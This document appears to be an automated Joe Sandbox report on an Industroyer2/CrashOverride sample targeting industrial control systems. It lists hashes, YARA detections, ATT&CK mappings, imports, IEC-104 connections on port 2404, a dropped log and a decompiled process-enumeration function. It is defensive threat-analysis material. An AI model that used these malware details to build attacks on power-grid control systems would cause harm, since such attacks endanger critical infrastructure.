Edit tour

Windows Analysis Report
40_115.exe

Overview

General Information

Sample Name:	40_115.exe
Analysis ID:	609861
MD5:	7c05da2e4612fca213430b6c93e76b06
SHA1:	fdeb96bc3d4ab32ef826e7e53f4fe1c72e580379
SHA256:	d69665f56ddef7ad4e71971f06432e59f1510a7194386e5f0e8926aea7b88e00
Tags:	exerelatedtoIndustroyerrelatedtoIndustroyer2sandstorm
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Yara signature match

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

Classification

Process Tree

System is w10x64

40_115.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\40_115.exe" MD5: 7C05DA2E4612FCA213430B6C93E76B06)

conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
40_115.exe	dragos_crashoverride_moduleStrings	IEC-104 Interaction Module Program Strings	Dragos Inc	0x82f4:$s2: MSTR ->> SLV 0x8340:$s2: MSTR ->> SLV 0x8558:$s2: MSTR ->> SLV 0x8364:$s3: MSTR <<- SLV 0x8380:$s3: MSTR <<- SLV 0x8390:$s3: MSTR <<- SLV 0x83a0:$s3: MSTR <<- SLV 0x83c4:$s3: MSTR <<- SLV 0x83e8:$s3: MSTR <<- SLV 0x840c:$s3: MSTR <<- SLV 0x8568:$s3: MSTR <<- SLV 0x85a8:$s4: Unknown APDU format !!!

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.234960631.0000000000A49000.00000002.00000001.01000000.00000003.sdmp	dragos_crashoverride_moduleStrings	IEC-104 Interaction Module Program Strings	Dragos Inc	0xcf4:$s2: MSTR ->> SLV 0xd40:$s2: MSTR ->> SLV 0xf58:$s2: MSTR ->> SLV 0xd64:$s3: MSTR <<- SLV 0xd80:$s3: MSTR <<- SLV 0xd90:$s3: MSTR <<- SLV 0xda0:$s3: MSTR <<- SLV 0xdc4:$s3: MSTR <<- SLV 0xde8:$s3: MSTR <<- SLV 0xe0c:$s3: MSTR <<- SLV 0xf68:$s3: MSTR <<- SLV 0xfa8:$s4: Unknown APDU format !!!
00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmp	dragos_crashoverride_moduleStrings	IEC-104 Interaction Module Program Strings	Dragos Inc	0xcf4:$s2: MSTR ->> SLV 0xd40:$s2: MSTR ->> SLV 0xf58:$s2: MSTR ->> SLV 0xd64:$s3: MSTR <<- SLV 0xd80:$s3: MSTR <<- SLV 0xd90:$s3: MSTR <<- SLV 0xda0:$s3: MSTR <<- SLV 0xdc4:$s3: MSTR <<- SLV 0xde8:$s3: MSTR <<- SLV 0xe0c:$s3: MSTR <<- SLV 0xf68:$s3: MSTR <<- SLV 0xfa8:$s4: Unknown APDU format !!!
Process Memory Space: 40_115.exe PID: 7112	dragos_crashoverride_moduleStrings	IEC-104 Interaction Module Program Strings	Dragos Inc	0x39e0:$s2: MSTR ->> SLV 0x3f71:$s2: MSTR ->> SLV 0x41fc:$s2: MSTR ->> SLV 0x6147:$s2: MSTR ->> SLV 0x66d8:$s2: MSTR ->> SLV 0x6963:$s2: MSTR ->> SLV 0x39f0:$s3: MSTR <<- SLV 0x3f90:$s3: MSTR <<- SLV 0x3fa8:$s3: MSTR <<- SLV 0x3fb7:$s3: MSTR <<- SLV 0x3fc6:$s3: MSTR <<- SLV 0x3fd7:$s3: MSTR <<- SLV 0x420b:$s3: MSTR <<- SLV 0x6157:$s3: MSTR <<- SLV 0x66f7:$s3: MSTR <<- SLV 0x670f:$s3: MSTR <<- SLV 0x671e:$s3: MSTR <<- SLV 0x672d:$s3: MSTR <<- SLV 0x673e:$s3: MSTR <<- SLV 0x6972:$s3: MSTR <<- SLV 0x4093:$s4: Unknown APDU format !!!

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.40_115.exe.a40000.0.unpack	dragos_crashoverride_moduleStrings	IEC-104 Interaction Module Program Strings	Dragos Inc	0x82f4:$s2: MSTR ->> SLV 0x8340:$s2: MSTR ->> SLV 0x8558:$s2: MSTR ->> SLV 0x8364:$s3: MSTR <<- SLV 0x8380:$s3: MSTR <<- SLV 0x8390:$s3: MSTR <<- SLV 0x83a0:$s3: MSTR <<- SLV 0x83c4:$s3: MSTR <<- SLV 0x83e8:$s3: MSTR <<- SLV 0x840c:$s3: MSTR <<- SLV 0x8568:$s3: MSTR <<- SLV 0x85a8:$s4: Unknown APDU format !!!
0.0.40_115.exe.a40000.0.unpack	dragos_crashoverride_moduleStrings	IEC-104 Interaction Module Program Strings	Dragos Inc	0x82f4:$s2: MSTR ->> SLV 0x8340:$s2: MSTR ->> SLV 0x8558:$s2: MSTR ->> SLV 0x8364:$s3: MSTR <<- SLV 0x8380:$s3: MSTR <<- SLV 0x8390:$s3: MSTR <<- SLV 0x83a0:$s3: MSTR <<- SLV 0x83c4:$s3: MSTR <<- SLV 0x83e8:$s3: MSTR <<- SLV 0x840c:$s3: MSTR <<- SLV 0x8568:$s3: MSTR <<- SLV 0x85a8:$s4: Unknown APDU format !!!

Sigma Signatures

There are no malicious signatures, click here to show all signatures.

Source: Process started

Author: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Users\user\Desktop\40_115.exe" , ParentImage: C:\Users\user\Desktop\40_115.exe, ParentProcessId: 7112, ParentProcessName: 40_115.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 7120, ProcessName: conhost.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 40_115.exe	Virustotal: Detection: 25%	Perma Link
Source: 40_115.exe	Metadefender: Detection: 14%	Perma Link
Source: 40_115.exe	ReversingLabs: Detection: 46%

Source: 40_115.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 40_115.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\40_115.exe

Code function: 0_2_00A45B30 recv,WSAGetLastError,WSAGetLastError,WSAGetLastError,

0_2_00A45B30

Source: 40_115.exe, 00000000.00000002.273477826.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 40_115.exe, type: SAMPLE	Matched rule: IEC-104 Interaction Module Program Strings Author: Dragos Inc
Source: 0.2.40_115.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: IEC-104 Interaction Module Program Strings Author: Dragos Inc
Source: 0.0.40_115.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: IEC-104 Interaction Module Program Strings Author: Dragos Inc
Source: 00000000.00000000.234960631.0000000000A49000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: IEC-104 Interaction Module Program Strings Author: Dragos Inc
Source: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: IEC-104 Interaction Module Program Strings Author: Dragos Inc
Source: Process Memory Space: 40_115.exe PID: 7112, type: MEMORYSTR	Matched rule: IEC-104 Interaction Module Program Strings Author: Dragos Inc

Source: 40_115.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 40_115.exe, type: SAMPLE	Matched rule: dragos_crashoverride_moduleStrings author = Dragos Inc, description = IEC-104 Interaction Module Program Strings, reference = https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
Source: 0.2.40_115.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: dragos_crashoverride_moduleStrings author = Dragos Inc, description = IEC-104 Interaction Module Program Strings, reference = https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
Source: 0.0.40_115.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: dragos_crashoverride_moduleStrings author = Dragos Inc, description = IEC-104 Interaction Module Program Strings, reference = https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
Source: 00000000.00000000.234960631.0000000000A49000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: dragos_crashoverride_moduleStrings author = Dragos Inc, description = IEC-104 Interaction Module Program Strings, reference = https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
Source: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: dragos_crashoverride_moduleStrings author = Dragos Inc, description = IEC-104 Interaction Module Program Strings, reference = https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
Source: Process Memory Space: 40_115.exe PID: 7112, type: MEMORYSTR	Matched rule: dragos_crashoverride_moduleStrings author = Dragos Inc, description = IEC-104 Interaction Module Program Strings, reference = https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

Source: C:\Users\user\Desktop\40_115.exe	Code function: String function: 00A436C0 appears 50 times
Source: C:\Users\user\Desktop\40_115.exe	Code function: String function: 00A43830 appears 42 times

Source: 40_115.exe	Virustotal: Detection: 25%
Source: 40_115.exe	Metadefender: Detection: 14%
Source: 40_115.exe	ReversingLabs: Detection: 46%

Source: 40_115.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\40_115.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\40_115.exe

Code function: 0_2_00A47920 CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,FindCloseChangeNotification,

0_2_00A47920

Source: C:\Users\user\Desktop\40_115.exe

Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess

graph_0-3866

Source: unknown	Process created: C:\Users\user\Desktop\40_115.exe "C:\Users\user\Desktop\40_115.exe"
Source: C:\Users\user\Desktop\40_115.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_01

Source: classification engine

Classification label: mal56.winEXE@2/1@0/3

Source: 40_115.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: 40_115.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: C:\Users\user\Desktop\40_115.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-4433

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\40_115.exe

Process information queried: ProcessInformation

Jump to behavior

Source: 40_115.exe, 00000000.00000002.273497890.0000000000E64000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5

Source: C:\Users\user\Desktop\40_115.exe

Code function: 0_2_00A42420 GetProcessHeap,RtlAllocateHeap,

0_2_00A42420

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\40_115.exe

Code function: 0_2_00A43970 GetSystemTime,

0_2_00A43970

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	1 Process Injection	1 Process Injection	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	2 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
40_115.exe	26%	Virustotal		Browse
40_115.exe	14%	Metadefender		Browse
40_115.exe	46%	ReversingLabs	Win32.Trojan.CrashOverride

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
10.82.40.105
192.168.121.2
192.168.122.2

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	609861
Start date and time: 15/04/202212:45:09	2022-04-15 12:45:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	40_115.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.winEXE@2/1@0/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 98.9% (good quality ratio 94.4%) Quality average: 87% Quality standard deviation: 23.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 26 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\40_115.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	517
Entropy (8bit):	3.934493837561938
Encrypted:	false
SSDEEP:	12:UNQdIUQqVffhmoHQdA0uAm4A+OQdC7oSg724WuE2dQapFdQo72sv:U8ffhWvmR+G7od71tEyQ4jQo73
MD5:	307BB8A6DE0F826D1B6C5DC8A2069A6A
SHA1:	F257CED8AE3BF1851F99E5537B79168C0889B710
SHA-256:	35DE9D340E57A2CBF08B2DAC1FB932EEFEC33A1BB4158E459F99ECF187B45E8F
SHA-512:	9FDC9CF1D94CEC89D670C317DEF316CBA6EFEF4D17A41EAE6BC8B9C5B55B10D27926CD94B92021F65834C333A095F5A4BC848CE860368C195B86C15E3942A387
Malicious:	false
Reputation:	low
Preview:	19:46:06:0106> T281 00006800.19:46:06:0247> RNM 0015 .19:46:06:0294> 10.82.40.105: 2404: 3 .19:46:06:0294> T65 00006800.19:46:06:0341> 10.82.40.105 M68B0 SGCNT 44 .19:46:06:0497> RNM 0015 .19:46:06:0544> T113 00006800.19:46:06:0544> 192.168.122.2: 2404: 2 .19:46:06:0544> 192.168.122.2 M68B0 SGCNT 8 .19:46:06:0591> RNM 0015 .19:46:06:0653> 192.168.121.2: 2404: 1 .19:46:06:0700> 192.168.121.2 M68B0 SGCNT 16 .19:46:21:0747> 192.168.122.2 M6812 .19:46:21:0747> 10.82.40.105 M6812 .19:46:21:0794> 192.168.121.2 M6812 .

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	5.891358753235737
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	40_115.exe
File size:	37888
MD5:	7c05da2e4612fca213430b6c93e76b06
SHA1:	fdeb96bc3d4ab32ef826e7e53f4fe1c72e580379
SHA256:	d69665f56ddef7ad4e71971f06432e59f1510a7194386e5f0e8926aea7b88e00
SHA512:	053d1a0b5ebab8b4afc26af20d533947bbc1c6de24c3ab0735f9bffcda3e05a2aef18b3f136102bbd2b5637b5f02b27906e0a092067e29d7943cdfb449fe8f27
SSDEEP:	768:9kQ2SkG1EqihRWlG4ya6kcqCHfv3uWvzPMinhgaXj7:9jo9kc3einhgaXv
TLSH:	A303F804994182BAE897E5FAC9FB005BA2169A85133866C332D81F59BF75DC07D31BCF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............g.^.g.^.g.^&.._.g.^&.._.g.^..q^.g.^.g.^.g.^..._.g.^..._.g.^Rich.g.^................PE..L...a.:b.................r.........

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x404ff0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x623AF161 [Wed Mar 23 10:07:29 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2cf6ff919d8af9170b36d01b351744f3

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 48h
mov dword ptr [ebp-04h], 00000000h
mov dword ptr [ebp-08h], 00000000h
mov dword ptr [ebp-30h], 00000000h
lea eax, dword ptr [ebp-08h]
push eax
call dword ptr [00409074h]
push eax
call dword ptr [004090ACh]
mov dword ptr [ebp-04h], eax
cmp dword ptr [ebp-04h], 00000000h
je 00007FF4C04C80FAh
cmp dword ptr [ebp-08h], 00000000h
je 00007FF4C04C80BCh
push 00409C80h
mov ecx, dword ptr [ebp-08h]
mov edx, dword ptr [ebp-04h]
lea eax, dword ptr [edx+ecx*4]
push eax
mov ecx, dword ptr [ebp-04h]
push ecx
call 00007FF4C04C6B5Ah
mov dword ptr [ebp-10h], eax
cmp dword ptr [ebp-10h], 00000000h
je 00007FF4C04C7FBDh
mov edx, dword ptr [ebp-10h]
push edx
lea ecx, dword ptr [ebp-48h]
call 00007FF4C04C5B55h
mov ecx, eax
call 00007FF4C04C5F7Eh
lea ecx, dword ptr [ebp-48h]
call 00007FF4C04C5EF6h
push 00409C88h
mov eax, dword ptr [ebp-08h]
mov ecx, dword ptr [ebp-04h]
lea edx, dword ptr [ecx+eax*4]
push edx
mov eax, dword ptr [ebp-04h]
push eax
call 00007FF4C04C6A7Eh
movzx ecx, al
test ecx, ecx
je 00007FF4C04C7FE6h
push 00409C90h
mov edx, dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
lea ecx, dword ptr [eax+edx*4]
push ecx
mov edx, dword ptr [ebp-04h]
push edx
call 00007FF4C04C6AFFh
mov dword ptr [ebp-14h], eax
cmp dword ptr [ebp-14h], 00000000h
je 00007FF4C04C7FB0h
call 00007FF4C04C65B1h
mov eax, dword ptr [ebp-14h]

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa234	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc000	0x334	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa0a0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x70ad	0x7200	False	0.435512609649	data	5.90126984257	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x16fc	0x1800	False	0.305826822917	data	4.19944141058	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x65	0x200	False	0.111328125	data	0.757808466987	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xc000	0x334	0x400	False	0.744140625	data	5.55161256585	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	HeapFree, HeapSize, HeapReAlloc, HeapAlloc, GetProcessHeap, SetWaitableTimer, EnterCriticalSection, CreateWaitableTimerW, WaitForMultipleObjects, LeaveCriticalSection, InitializeCriticalSection, GetExitCodeThread, TerminateThread, CloseHandle, CreateThread, DeleteCriticalSection, CompareFileTime, WaitForMultipleObjectsEx, OpenEventW, FileTimeToSystemTime, SystemTimeToFileTime, GetSystemTime, MultiByteToWideChar, WideCharToMultiByte, GetStdHandle, WriteFile, InterlockedCompareExchange, CreateFileW, Sleep, GetCommandLineW, LocalFree, ExitProcess, MoveFileA, Process32First, TerminateProcess, OpenProcess, CreateToolhelp32Snapshot, GetLastError, Process32Next
WS2_32.dll	WSAStartup, select, send, __WSAFDIsSet, WSACleanup, inet_addr, socket, connect, recv, htons, ioctlsocket, setsockopt, WSAGetLastError, closesocket
SHELL32.dll	CommandLineToArgvW
OLEAUT32.dll	VarDateFromStr, VariantTimeToSystemTime
SHLWAPI.dll	wvnsprintfA, StrToIntA, wnsprintfW

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 15, 2022 12:46:07.662655115 CEST	49719	2404	192.168.2.3	10.82.40.105
Apr 15, 2022 12:46:07.701092958 CEST	49720	2404	192.168.2.3	192.168.122.2
Apr 15, 2022 12:46:07.818216085 CEST	49721	2404	192.168.2.3	192.168.121.2
Apr 15, 2022 12:46:10.676040888 CEST	49719	2404	192.168.2.3	10.82.40.105
Apr 15, 2022 12:46:10.707295895 CEST	49720	2404	192.168.2.3	192.168.122.2
Apr 15, 2022 12:46:10.832375050 CEST	49721	2404	192.168.2.3	192.168.121.2
Apr 15, 2022 12:46:16.692266941 CEST	49719	2404	192.168.2.3	10.82.40.105
Apr 15, 2022 12:46:16.707885027 CEST	49720	2404	192.168.2.3	192.168.122.2
Apr 15, 2022 12:46:16.832829952 CEST	49721	2404	192.168.2.3	192.168.121.2

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 40_115.exePID: 7112, Parent PID: 6024

General

Target ID:	0
Start time:	12:46:05
Start date:	15/04/2022
Path:	C:\Users\user\Desktop\40_115.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\40_115.exe"
Imagebase:	0xa40000
File size:	37888 bytes
MD5 hash:	7C05DA2E4612FCA213430B6C93E76B06
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: dragos_crashoverride_moduleStrings, Description: IEC-104 Interaction Module Program Strings, Source: 00000000.00000000.234960631.0000000000A49000.00000002.00000001.01000000.00000003.sdmp, Author: Dragos Inc Rule: dragos_crashoverride_moduleStrings, Description: IEC-104 Interaction Module Program Strings, Source: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmp, Author: Dragos Inc
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7120, Parent PID: 7112

General

Target ID:	1
Start time:	12:46:05
Start date:	15/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 40_115.exePID: 7112, Parent PID: 6024COMMON

Execution Graph

Execution Coverage:	14%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	809
Total number of Limit Nodes:	19

Executed Functions

Function 00A47920 Relevance: 7.5, APIs: 5, Instructions: 46
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A47920(intOrPtr _a4) {
				void* _v8;
				char _v268;
				intOrPtr _v296;
				void* _v304;
				void* _t13;
				int _t15;
				void* _t19;
				int _t21;
				void* _t30;

				_v304 = 0x128;
				_t13 = CreateToolhelp32Snapshot(0xf, 0); // executed
				_v8 = _t13;
				if(_v8 != 0xffffffff) {
					_t25 = _v8;
					_t15 = Process32First(_v8,  &_v304); // executed
					if(_t15 == 0) {
						L6:
						FindCloseChangeNotification(_v8); // executed
						return 0;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t19 = E00A43A90( &_v268, _t25,  &_v268, _a4);
						_t30 = _t30 + 8;
						if(_t19 == 0) {
							break;
						}
						_t21 = Process32Next(_v8,  &_v304); // executed
						if(_t21 != 0) {
							continue;
						}
						goto L6;
					}
					CloseHandle(_v8);
					return _v296;
				}
				return 0;
			}

0x00a47929
0x00a47937
0x00a4793d
0x00a47944
0x00a47951
0x00a47955
0x00a4795d
0x00a4799d
0x00a479a1
0x00000000
0x00000000
0x00000000
0x00000000
0x00a4795f
0x00a4795f
0x00a4796a
0x00a4796f
0x00a47974
0x00000000
0x00000000
0x00a47993
0x00a4799b
0x00000000
0x00000000
0x00000000
0x00a4799b
0x00a4797a
0x00000000
0x00a47980
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00A47937
Process32First.KERNEL32(000000FF,00000128), ref: 00A47955
CloseHandle.KERNEL32(000000FF), ref: 00A4797A

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID:
API String ID: 1083639309-0
Opcode ID: f28c58954e970b4bc88306afcce4bab22201ab15947e6d69cbb169e9bbfbc0dd
Instruction ID: 41da27be292f43c7c680b033a99219a032f2b237748e89e4e9ea7d952cf18035
